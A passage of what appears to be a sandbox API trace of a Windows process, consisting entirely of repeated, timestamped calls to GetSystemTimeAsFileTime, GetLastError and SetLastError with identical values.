lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.522] GetLastError () returned 0x0 [0110.522] SetLastError (dwErrCode=0x0) [0110.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetLastError () returned 0x0 [0110.523] SetLastError (dwErrCode=0x0) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.523] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] 